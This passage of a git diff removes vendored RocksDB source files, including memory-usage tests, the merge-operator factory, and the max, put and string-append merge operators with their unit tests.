-      }
-      dbs[i]->Flush(FlushOptions());
-    }
-  }
-  for (int i = 0; i < kNumDBs; ++i) {
-    for (auto& key : keys_by_db[i]) {
-      std::string value;
-      dbs[i]->Get(ReadOptions(), key, &value);
-    }
-    UpdateUsagesHistory(dbs);
-  }
-  for (size_t i = 1; i < usage_history_[MemoryUtil::kMemTableTotal].size();
-       ++i) {
-    // Expect EQ as we didn't flush more memtables.
-    ASSERT_EQ(usage_history_[MemoryUtil::kTableReadersTotal][i],
-              usage_history_[MemoryUtil::kTableReadersTotal][i - 1]);
-  }
-  for (int i = 0; i < kNumDBs; ++i) {
-    delete dbs[i];
-  }
-}
-
-TEST_F(MemoryTest, MemTableAndTableReadersTotal) {
-  std::vector<DB*> dbs;
-  std::vector<uint64_t> usage_by_type;
-  std::vector<std::vector<ColumnFamilyHandle*>> vec_handles;
-  const int kNumDBs = 10;
-  const int kKeySize = 100;
-  const int kValueSize = 500;
-  Options opt;
-  opt.create_if_missing = true;
-  opt.create_missing_column_families = true;
-  opt.write_buffer_size = kKeySize + kValueSize;
-  opt.max_write_buffer_number = 10;
-  opt.min_write_buffer_number_to_merge = 10;
-  opt.disable_auto_compactions = true;
-
-  std::vector<ColumnFamilyDescriptor> cf_descs = {
-      {kDefaultColumnFamilyName, ColumnFamilyOptions(opt)},
-      {"one", ColumnFamilyOptions(opt)},
-      {"two", ColumnFamilyOptions(opt)},
-  };
-
-  for (int i = 0; i < kNumDBs; ++i) {
-    DestroyDB(GetDBName(i), opt);
-    std::vector<ColumnFamilyHandle*> handles;
-    dbs.emplace_back();
-    vec_handles.emplace_back();
-    ASSERT_OK(DB::Open(DBOptions(opt), GetDBName(i), cf_descs,
-                       &vec_handles.back(), &dbs.back()));
-  }
-
-  // Fill one memtable per Put to make memtable use more memory.
-  for (int p = 0; p < opt.min_write_buffer_number_to_merge / 2; ++p) {
-    for (int i = 0; i < kNumDBs; ++i) {
-      for (auto* handle : vec_handles[i]) {
-        dbs[i]->Put(WriteOptions(), handle, RandomString(kKeySize),
-                    RandomString(kValueSize));
-        UpdateUsagesHistory(dbs);
-      }
-    }
-  }
-  // Expect the usage history is monotonically increasing
-  for (size_t i = 1; i < usage_history_[MemoryUtil::kMemTableTotal].size();
-       ++i) {
-    ASSERT_GT(usage_history_[MemoryUtil::kMemTableTotal][i],
-              usage_history_[MemoryUtil::kMemTableTotal][i - 1]);
-    ASSERT_GT(usage_history_[MemoryUtil::kMemTableUnFlushed][i],
-              usage_history_[MemoryUtil::kMemTableUnFlushed][i - 1]);
-    ASSERT_EQ(usage_history_[MemoryUtil::kTableReadersTotal][i],
-              usage_history_[MemoryUtil::kTableReadersTotal][i - 1]);
-  }
-
-  size_t usage_check_point = usage_history_[MemoryUtil::kMemTableTotal].size();
-  std::vector<Iterator*> iters;
-
-  // Create an iterator and flush all memtables for each db
-  for (int i = 0; i < kNumDBs; ++i) {
-    iters.push_back(dbs[i]->NewIterator(ReadOptions()));
-    dbs[i]->Flush(FlushOptions());
-
-    for (int j = 0; j < 100; ++j) {
-      std::string value;
-      dbs[i]->Get(ReadOptions(), RandomString(kKeySize), &value);
-    }
-
-    UpdateUsagesHistory(dbs);
-  }
-  for (size_t i = usage_check_point;
-       i < usage_history_[MemoryUtil::kMemTableTotal].size(); ++i) {
-    // Since memtables are pinned by iterators, we don't expect the
-    // memory usage of all the memtables decreases as they are pinned
-    // by iterators.
-    ASSERT_GE(usage_history_[MemoryUtil::kMemTableTotal][i],
-              usage_history_[MemoryUtil::kMemTableTotal][i - 1]);
-    // Expect the usage history from the "usage_decay_point" is
-    // monotonically decreasing.
-    ASSERT_LT(usage_history_[MemoryUtil::kMemTableUnFlushed][i],
-              usage_history_[MemoryUtil::kMemTableUnFlushed][i - 1]);
-    // Expect the usage history of the table readers increases
-    // as we flush tables.
-    ASSERT_GT(usage_history_[MemoryUtil::kTableReadersTotal][i],
-              usage_history_[MemoryUtil::kTableReadersTotal][i - 1]);
-    ASSERT_GT(usage_history_[MemoryUtil::kCacheTotal][i],
-              usage_history_[MemoryUtil::kCacheTotal][i - 1]);
-  }
-  usage_check_point = usage_history_[MemoryUtil::kMemTableTotal].size();
-  for (int i = 0; i < kNumDBs; ++i) {
-    delete iters[i];
-    UpdateUsagesHistory(dbs);
-  }
-  for (size_t i = usage_check_point;
-       i < usage_history_[MemoryUtil::kMemTableTotal].size(); ++i) {
-    // Expect the usage of all memtables decreasing as we delete iterators.
-    ASSERT_LT(usage_history_[MemoryUtil::kMemTableTotal][i],
-              usage_history_[MemoryUtil::kMemTableTotal][i - 1]);
-    // Since the memory usage of un-flushed memtables is only affected
-    // by Put and flush, we expect EQ here as we only delete iterators.
-    ASSERT_EQ(usage_history_[MemoryUtil::kMemTableUnFlushed][i],
-              usage_history_[MemoryUtil::kMemTableUnFlushed][i - 1]);
-    // Expect EQ as we didn't flush more memtables.
-    ASSERT_EQ(usage_history_[MemoryUtil::kTableReadersTotal][i],
-              usage_history_[MemoryUtil::kTableReadersTotal][i - 1]);
-  }
-
-  for (int i = 0; i < kNumDBs; ++i) {
-    for (auto* handle : vec_handles[i]) {
-      delete handle;
-    }
-    delete dbs[i];
-  }
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-#if !(defined NDEBUG) || !defined(OS_WIN)
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
-
-#else
-#include <cstdio>
-
-int main(int argc, char** argv) {
-  printf("Skipped in RocksDBLite as utilities are not supported.\n");
-  return 0;
-}
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/memory/memory_util.cc b/thirdparty/rocksdb/utilities/memory/memory_util.cc
deleted file mode 100644
index 83bf33c..0000000
--- a/thirdparty/rocksdb/utilities/memory/memory_util.cc
+++ /dev/null
@@ -1,52 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/memory_util.h"
-
-#include "db/db_impl.h"
-
-namespace rocksdb {
-
-Status MemoryUtil::GetApproximateMemoryUsageByType(
-    const std::vector<DB*>& dbs,
-    const std::unordered_set<const Cache*> cache_set,
-    std::map<MemoryUtil::UsageType, uint64_t>* usage_by_type) {
-  usage_by_type->clear();
-
-  // MemTable
-  for (auto* db : dbs) {
-    uint64_t usage = 0;
-    if (db->GetAggregatedIntProperty(DB::Properties::kSizeAllMemTables,
-                                     &usage)) {
-      (*usage_by_type)[MemoryUtil::kMemTableTotal] += usage;
-    }
-    if (db->GetAggregatedIntProperty(DB::Properties::kCurSizeAllMemTables,
-                                     &usage)) {
-      (*usage_by_type)[MemoryUtil::kMemTableUnFlushed] += usage;
-    }
-  }
-
-  // Table Readers
-  for (auto* db : dbs) {
-    uint64_t usage = 0;
-    if (db->GetAggregatedIntProperty(DB::Properties::kEstimateTableReadersMem,
-                                     &usage)) {
-      (*usage_by_type)[MemoryUtil::kTableReadersTotal] += usage;
-    }
-  }
-
-  // Cache
-  for (const auto* cache : cache_set) {
-    if (cache != nullptr) {
-      (*usage_by_type)[MemoryUtil::kCacheTotal] += cache->GetUsage();
-    }
-  }
-
-  return Status::OK();
-}
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/merge_operators.h b/thirdparty/rocksdb/utilities/merge_operators.h
deleted file mode 100644
index 72f805a..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators.h
+++ /dev/null
@@ -1,54 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef MERGE_OPERATORS_H
-#define MERGE_OPERATORS_H
-
-#include <memory>
-#include <stdio.h>
-
-#include "rocksdb/merge_operator.h"
-
-namespace rocksdb {
-
-class MergeOperators {
- public:
-  static std::shared_ptr<MergeOperator> CreatePutOperator();
-  static std::shared_ptr<MergeOperator> CreateDeprecatedPutOperator();
-  static std::shared_ptr<MergeOperator> CreateUInt64AddOperator();
-  static std::shared_ptr<MergeOperator> CreateStringAppendOperator();
-  static std::shared_ptr<MergeOperator> CreateStringAppendTESTOperator();
-  static std::shared_ptr<MergeOperator> CreateMaxOperator();
-  static std::shared_ptr<MergeOperator> CreateCassandraMergeOperator();
-
-  // Will return a different merge operator depending on the string.
-  // TODO: Hook the "name" up to the actual Name() of the MergeOperators?
-  static std::shared_ptr<MergeOperator> CreateFromStringId(
-      const std::string& name) {
-    if (name == "put") {
-      return CreatePutOperator();
-    } else if (name == "put_v1") {
-      return CreateDeprecatedPutOperator();
-    } else if ( name == "uint64add") {
-      return CreateUInt64AddOperator();
-    } else if (name == "stringappend") {
-      return CreateStringAppendOperator();
-    } else if (name == "stringappendtest") {
-      return CreateStringAppendTESTOperator();
-    } else if (name == "max") {
-      return CreateMaxOperator();
-    } else if (name == "cassandra") {
-      return CreateCassandraMergeOperator();
-    } else {
-      // Empty or unknown, just return nullptr
-      return nullptr;
-    }
-  }
-
-};
-
-} // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/merge_operators/max.cc b/thirdparty/rocksdb/utilities/merge_operators/max.cc
deleted file mode 100644
index 5f42e81..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/max.cc
+++ /dev/null
@@ -1,77 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-#include "utilities/merge_operators.h"
-
-using rocksdb::Slice;
-using rocksdb::Logger;
-using rocksdb::MergeOperator;
-
-namespace {  // anonymous namespace
-
-// Merge operator that picks the maximum operand, Comparison is based on
-// Slice::compare
-class MaxOperator : public MergeOperator {
- public:
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    Slice& max = merge_out->existing_operand;
-    if (merge_in.existing_value) {
-      max = Slice(merge_in.existing_value->data(),
-                  merge_in.existing_value->size());
-    } else if (max.data() == nullptr) {
-      max = Slice();
-    }
-
-    for (const auto& op : merge_in.operand_list) {
-      if (max.compare(op) < 0) {
-        max = op;
-      }
-    }
-
-    return true;
-  }
-
-  virtual bool PartialMerge(const Slice& key, const Slice& left_operand,
-                            const Slice& right_operand, std::string* new_value,
-                            Logger* logger) const override {
-    if (left_operand.compare(right_operand) >= 0) {
-      new_value->assign(left_operand.data(), left_operand.size());
-    } else {
-      new_value->assign(right_operand.data(), right_operand.size());
-    }
-    return true;
-  }
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
-    Slice max;
-    for (const auto& operand : operand_list) {
-      if (max.compare(operand) < 0) {
-        max = operand;
-      }
-    }
-
-    new_value->assign(max.data(), max.size());
-    return true;
-  }
-
-  virtual const char* Name() const override { return "MaxOperator"; }
-};
-
-}  // end of anonymous namespace
-
-namespace rocksdb {
-
-std::shared_ptr<MergeOperator> MergeOperators::CreateMaxOperator() {
-  return std::make_shared<MaxOperator>();
-}
-}
diff --git a/thirdparty/rocksdb/utilities/merge_operators/put.cc b/thirdparty/rocksdb/utilities/merge_operators/put.cc
deleted file mode 100644
index 7f206ad..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/put.cc
+++ /dev/null
@@ -1,89 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-#include "rocksdb/slice.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-
-using namespace rocksdb;
-
-namespace { // anonymous namespace
-
-// A merge operator that mimics Put semantics
-// Since this merge-operator will not be used in production,
-// it is implemented as a non-associative merge operator to illustrate the
-// new interface and for testing purposes. (That is, we inherit from
-// the MergeOperator class rather than the AssociativeMergeOperator
-// which would be simpler in this case).
-//
-// From the client-perspective, semantics are the same.
-class PutOperator : public MergeOperator {
- public:
-  virtual bool FullMerge(const Slice& key,
-                         const Slice* existing_value,
-                         const std::deque<std::string>& operand_sequence,
-                         std::string* new_value,
-                         Logger* logger) const override {
-    // Put basically only looks at the current/latest value
-    assert(!operand_sequence.empty());
-    assert(new_value != nullptr);
-    new_value->assign(operand_sequence.back());
-    return true;
-  }
-
-  virtual bool PartialMerge(const Slice& key,
-                            const Slice& left_operand,
-                            const Slice& right_operand,
-                            std::string* new_value,
-                            Logger* logger) const override {
-    new_value->assign(right_operand.data(), right_operand.size());
-    return true;
-  }
-
-  using MergeOperator::PartialMergeMulti;
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value, Logger* logger) const
-      override {
-    new_value->assign(operand_list.back().data(), operand_list.back().size());
-    return true;
-  }
-
-  virtual const char* Name() const override {
-    return "PutOperator";
-  }
-};
-
-class PutOperatorV2 : public PutOperator {
-  virtual bool FullMerge(const Slice& key, const Slice* existing_value,
-                         const std::deque<std::string>& operand_sequence,
-                         std::string* new_value,
-                         Logger* logger) const override {
-    assert(false);
-    return false;
-  }
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    // Put basically only looks at the current/latest value
-    assert(!merge_in.operand_list.empty());
-    merge_out->existing_operand = merge_in.operand_list.back();
-    return true;
-  }
-};
-
-} // end of anonymous namespace
-
-namespace rocksdb {
-
-std::shared_ptr<MergeOperator> MergeOperators::CreateDeprecatedPutOperator() {
-  return std::make_shared<PutOperator>();
-}
-
-std::shared_ptr<MergeOperator> MergeOperators::CreatePutOperator() {
-  return std::make_shared<PutOperatorV2>();
-}
-}
diff --git a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.cc b/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.cc
deleted file mode 100644
index ff19348..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.cc
+++ /dev/null
@@ -1,57 +0,0 @@
-/**
- * A MergeOperator for rocksdb that implements string append.
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#include "stringappend.h"
-
-#include <memory>
-#include <assert.h>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-// Constructor: also specify the delimiter character.
-StringAppendOperator::StringAppendOperator(char delim_char)
-    : delim_(delim_char) {
-}
-
-// Implementation for the merge operation (concatenates two strings)
-bool StringAppendOperator::Merge(const Slice& key,
-                                 const Slice* existing_value,
-                                 const Slice& value,
-                                 std::string* new_value,
-                                 Logger* logger) const {
-
-  // Clear the *new_value for writing.
-  assert(new_value);
-  new_value->clear();
-
-  if (!existing_value) {
-    // No existing_value. Set *new_value = value
-    new_value->assign(value.data(),value.size());
-  } else {
-    // Generic append (existing_value != null).
-    // Reserve *new_value to correct size, and apply concatenation.
-    new_value->reserve(existing_value->size() + 1 + value.size());
-    new_value->assign(existing_value->data(),existing_value->size());
-    new_value->append(1,delim_);
-    new_value->append(value.data(), value.size());
-  }
-
-  return true;
-}
-
-const char* StringAppendOperator::Name() const  {
-  return "StringAppendOperator";
-}
-
-std::shared_ptr<MergeOperator> MergeOperators::CreateStringAppendOperator() {
-  return std::make_shared<StringAppendOperator>(',');
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.h b/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.h
deleted file mode 100644
index 621d151..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.h
+++ /dev/null
@@ -1,31 +0,0 @@
-/**
- * A MergeOperator for rocksdb that implements string append.
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#pragma once
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class StringAppendOperator : public AssociativeMergeOperator {
- public:
-  // Constructor: specify delimiter
-  explicit StringAppendOperator(char delim_char);
-
-  virtual bool Merge(const Slice& key,
-                     const Slice* existing_value,
-                     const Slice& value,
-                     std::string* new_value,
-                     Logger* logger) const override;
-
-  virtual const char* Name() const override;
-
- private:
-  char delim_;         // The delimiter is inserted between elements
-
-};
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.cc b/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.cc
deleted file mode 100644
index 2d7b742..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.cc
+++ /dev/null
@@ -1,117 +0,0 @@
-/**
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#include "stringappend2.h"
-
-#include <memory>
-#include <string>
-#include <assert.h>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-// Constructor: also specify the delimiter character.
-StringAppendTESTOperator::StringAppendTESTOperator(char delim_char)
-    : delim_(delim_char) {
-}
-
-// Implementation for the merge operation (concatenates two strings)
-bool StringAppendTESTOperator::FullMergeV2(
-    const MergeOperationInput& merge_in,
-    MergeOperationOutput* merge_out) const {
-  // Clear the *new_value for writing.
-  merge_out->new_value.clear();
-
-  if (merge_in.existing_value == nullptr && merge_in.operand_list.size() == 1) {
-    // Only one operand
-    merge_out->existing_operand = merge_in.operand_list.back();
-    return true;
-  }
-
-  // Compute the space needed for the final result.
-  size_t numBytes = 0;
-  for (auto it = merge_in.operand_list.begin();
-       it != merge_in.operand_list.end(); ++it) {
-    numBytes += it->size() + 1;   // Plus 1 for the delimiter
-  }
-
-  // Only print the delimiter after the first entry has been printed
-  bool printDelim = false;
-
-  // Prepend the *existing_value if one exists.
-  if (merge_in.existing_value) {
-    merge_out->new_value.reserve(numBytes + merge_in.existing_value->size());
-    merge_out->new_value.append(merge_in.existing_value->data(),
-                                merge_in.existing_value->size());
-    printDelim = true;
-  } else if (numBytes) {
-    merge_out->new_value.reserve(
-        numBytes - 1);  // Minus 1 since we have one less delimiter
-  }
-
-  // Concatenate the sequence of strings (and add a delimiter between each)
-  for (auto it = merge_in.operand_list.begin();
-       it != merge_in.operand_list.end(); ++it) {
-    if (printDelim) {
-      merge_out->new_value.append(1, delim_);
-    }
-    merge_out->new_value.append(it->data(), it->size());
-    printDelim = true;
-  }
-
-  return true;
-}
-
-bool StringAppendTESTOperator::PartialMergeMulti(
-    const Slice& key, const std::deque<Slice>& operand_list,
-    std::string* new_value, Logger* logger) const {
-  return false;
-}
-
-// A version of PartialMerge that actually performs "partial merging".
-// Use this to simulate the exact behaviour of the StringAppendOperator.
-bool StringAppendTESTOperator::_AssocPartialMergeMulti(
-    const Slice& key, const std::deque<Slice>& operand_list,
-    std::string* new_value, Logger* logger) const {
-  // Clear the *new_value for writing
-  assert(new_value);
-  new_value->clear();
-  assert(operand_list.size() >= 2);
-
-  // Generic append
-  // Determine and reserve correct size for *new_value.
-  size_t size = 0;
-  for (const auto& operand : operand_list) {
-    size += operand.size();
-  }
-  size += operand_list.size() - 1;  // Delimiters
-  new_value->reserve(size);
-
-  // Apply concatenation
-  new_value->assign(operand_list.front().data(), operand_list.front().size());
-
-  for (std::deque<Slice>::const_iterator it = operand_list.begin() + 1;
-       it != operand_list.end(); ++it) {
-    new_value->append(1, delim_);
-    new_value->append(it->data(), it->size());
-  }
-
-  return true;
-}
-
-const char* StringAppendTESTOperator::Name() const  {
-  return "StringAppendTESTOperator";
-}
-
-
-std::shared_ptr<MergeOperator>
-MergeOperators::CreateStringAppendTESTOperator() {
-  return std::make_shared<StringAppendTESTOperator>(',');
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.h b/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.h
deleted file mode 100644
index d979f14..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.h
+++ /dev/null
@@ -1,48 +0,0 @@
-/**
- * A TEST MergeOperator for rocksdb that implements string append.
- * It is built using the MergeOperator interface rather than the simpler
- * AssociativeMergeOperator interface. This is useful for testing/benchmarking.
- * While the two operators are semantically the same, all production code
- * should use the StringAppendOperator defined in stringappend.{h,cc}. The
- * operator defined in the present file is primarily for testing.
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#pragma once
-#include <deque>
-#include <string>
-
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class StringAppendTESTOperator : public MergeOperator {
- public:
-  // Constructor with delimiter
-  explicit StringAppendTESTOperator(char delim_char);
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override;
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value, Logger* logger) const
-      override;
-
-  virtual const char* Name() const override;
-
- private:
-  // A version of PartialMerge that actually performs "partial merging".
-  // Use this to simulate the exact behaviour of the StringAppendOperator.
-  bool _AssocPartialMergeMulti(const Slice& key,
-                               const std::deque<Slice>& operand_list,
-                               std::string* new_value, Logger* logger) const;
-
-  char delim_;         // The delimiter is inserted between elements
-
-};
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend_test.cc b/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend_test.cc
deleted file mode 100644
index a12e130..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend_test.cc
+++ /dev/null
@@ -1,600 +0,0 @@
-/**
- * An persistent map : key -> (list of strings), using rocksdb merge.
- * This file is a test-harness / use-case for the StringAppendOperator.
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook, Inc.
-*/
-
-#include <iostream>
-#include <map>
-
-#include "rocksdb/db.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "utilities/merge_operators.h"
-#include "utilities/merge_operators/string_append/stringappend.h"
-#include "utilities/merge_operators/string_append/stringappend2.h"
-#include "util/testharness.h"
-#include "util/random.h"
-
-using namespace rocksdb;
-
-namespace rocksdb {
-
-// Path to the database on file system
-const std::string kDbName = test::TmpDir() + "/stringappend_test";
-
-namespace {
-// OpenDb opens a (possibly new) rocksdb database with a StringAppendOperator
-std::shared_ptr<DB> OpenNormalDb(char delim_char) {
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new StringAppendOperator(delim_char));
-  EXPECT_OK(DB::Open(options, kDbName, &db));
-  return std::shared_ptr<DB>(db);
-}
-
-#ifndef ROCKSDB_LITE  // TtlDb is not supported in Lite
-// Open a TtlDB with a non-associative StringAppendTESTOperator
-std::shared_ptr<DB> OpenTtlDb(char delim_char) {
-  DBWithTTL* db;
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new StringAppendTESTOperator(delim_char));
-  EXPECT_OK(DBWithTTL::Open(options, kDbName, &db, 123456));
-  return std::shared_ptr<DB>(db);
-}
-#endif  // !ROCKSDB_LITE
-}  // namespace
-
-/// StringLists represents a set of string-lists, each with a key-index.
-/// Supports Append(list, string) and Get(list)
-class StringLists {
- public:
-
-  //Constructor: specifies the rocksdb db
-  /* implicit */
-  StringLists(std::shared_ptr<DB> db)
-      : db_(db),
-        merge_option_(),
-        get_option_() {
-    assert(db);
-  }
-
-  // Append string val onto the list defined by key; return true on success
-  bool Append(const std::string& key, const std::string& val){
-    Slice valSlice(val.data(), val.size());
-    auto s = db_->Merge(merge_option_, key, valSlice);
-
-    if (s.ok()) {
-      return true;
-    } else {
-      std::cerr << "ERROR " << s.ToString() << std::endl;
-      return false;
-    }
-  }
-
-  // Returns the list of strings associated with key (or "" if does not exist)
-  bool Get(const std::string& key, std::string* const result){
-    assert(result != nullptr); // we should have a place to store the result
-    auto s = db_->Get(get_option_, key, result);
-
-    if (s.ok()) {
-      return true;
-    }
-
-    // Either key does not exist, or there is some error.
-    *result = "";       // Always return empty string (just for convention)
-
-    //NotFound is okay; just return empty (similar to std::map)
-    //But network or db errors, etc, should fail the test (or at least yell)
-    if (!s.IsNotFound()) {
-      std::cerr << "ERROR " << s.ToString() << std::endl;
-    }
-
-    // Always return false if s.ok() was not true
-    return false;
-  }
-
-
- private:
-  std::shared_ptr<DB> db_;
-  WriteOptions merge_option_;
-  ReadOptions get_option_;
-
-};
-
-
-// The class for unit-testing
-class StringAppendOperatorTest : public testing::Test {
- public:
-  StringAppendOperatorTest() {
-    DestroyDB(kDbName, Options());    // Start each test with a fresh DB
-  }
-
-  typedef std::shared_ptr<DB> (* OpenFuncPtr)(char);
-
-  // Allows user to open databases with different configurations.
-  // e.g.: Can open a DB or a TtlDB, etc.
-  static void SetOpenDbFunction(OpenFuncPtr func) {
-    OpenDb = func;
-  }
-
- protected:
-  static OpenFuncPtr OpenDb;
-};
-StringAppendOperatorTest::OpenFuncPtr StringAppendOperatorTest::OpenDb = nullptr;
-
-// THE TEST CASES BEGIN HERE
-
-TEST_F(StringAppendOperatorTest, IteratorTest) {
-  auto db_ = OpenDb(',');
-  StringLists slists(db_);
-
-  slists.Append("k1", "v1");
-  slists.Append("k1", "v2");
-  slists.Append("k1", "v3");
-
-  slists.Append("k2", "a1");
-  slists.Append("k2", "a2");
-  slists.Append("k2", "a3");
-
-  std::string res;
-  std::unique_ptr<rocksdb::Iterator> it(db_->NewIterator(ReadOptions()));
-  std::string k1("k1");
-  std::string k2("k2");
-  bool first = true;
-  for (it->Seek(k1); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      ASSERT_EQ(res, "v1,v2,v3");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "a1,a2,a3");
-    }
-  }
-  slists.Append("k2", "a4");
-  slists.Append("k1", "v4");
-
-  // Snapshot should still be the same. Should ignore a4 and v4.
-  first = true;
-  for (it->Seek(k1); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      ASSERT_EQ(res, "v1,v2,v3");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "a1,a2,a3");
-    }
-  }
-
-
-  // Should release the snapshot and be aware of the new stuff now
-  it.reset(db_->NewIterator(ReadOptions()));
-  first = true;
-  for (it->Seek(k1); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      ASSERT_EQ(res, "v1,v2,v3,v4");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "a1,a2,a3,a4");
-    }
-  }
-
-  // start from k2 this time.
-  for (it->Seek(k2); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      ASSERT_EQ(res, "v1,v2,v3,v4");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "a1,a2,a3,a4");
-    }
-  }
-
-  slists.Append("k3", "g1");
-
-  it.reset(db_->NewIterator(ReadOptions()));
-  first = true;
-  std::string k3("k3");
-  for(it->Seek(k2); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      ASSERT_EQ(res, "a1,a2,a3,a4");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "g1");
-    }
-  }
-  for(it->Seek(k3); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      // should not be hit
-      ASSERT_EQ(res, "a1,a2,a3,a4");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "g1");
-    }
-  }
-
-}
-
-TEST_F(StringAppendOperatorTest, SimpleTest) {
-  auto db = OpenDb(',');
-  StringLists slists(db);
-
-  slists.Append("k1", "v1");
-  slists.Append("k1", "v2");
-  slists.Append("k1", "v3");
-
-  std::string res;
-  bool status = slists.Get("k1", &res);
-
-  ASSERT_TRUE(status);
-  ASSERT_EQ(res, "v1,v2,v3");
-}
-
-TEST_F(StringAppendOperatorTest, SimpleDelimiterTest) {
-  auto db = OpenDb('|');
-  StringLists slists(db);
-
-  slists.Append("k1", "v1");
-  slists.Append("k1", "v2");
-  slists.Append("k1", "v3");
-
-  std::string res;
-  slists.Get("k1", &res);
-  ASSERT_EQ(res, "v1|v2|v3");
-}
-
-TEST_F(StringAppendOperatorTest, OneValueNoDelimiterTest) {
-  auto db = OpenDb('!');
-  StringLists slists(db);
-
-  slists.Append("random_key", "single_val");
-
-  std::string res;
-  slists.Get("random_key", &res);
-  ASSERT_EQ(res, "single_val");
-}
-
-TEST_F(StringAppendOperatorTest, VariousKeys) {
-  auto db = OpenDb('\n');
-  StringLists slists(db);
-
-  slists.Append("c", "asdasd");
-  slists.Append("a", "x");
-  slists.Append("b", "y");
-  slists.Append("a", "t");
-  slists.Append("a", "r");
-  slists.Append("b", "2");
-  slists.Append("c", "asdasd");
-
-  std::string a, b, c;
-  bool sa, sb, sc;
-  sa = slists.Get("a", &a);
-  sb = slists.Get("b", &b);
-  sc = slists.Get("c", &c);
-
-  ASSERT_TRUE(sa && sb && sc); // All three keys should have been found
-
-  ASSERT_EQ(a, "x\nt\nr");
-  ASSERT_EQ(b, "y\n2");
-  ASSERT_EQ(c, "asdasd\nasdasd");
-}
-
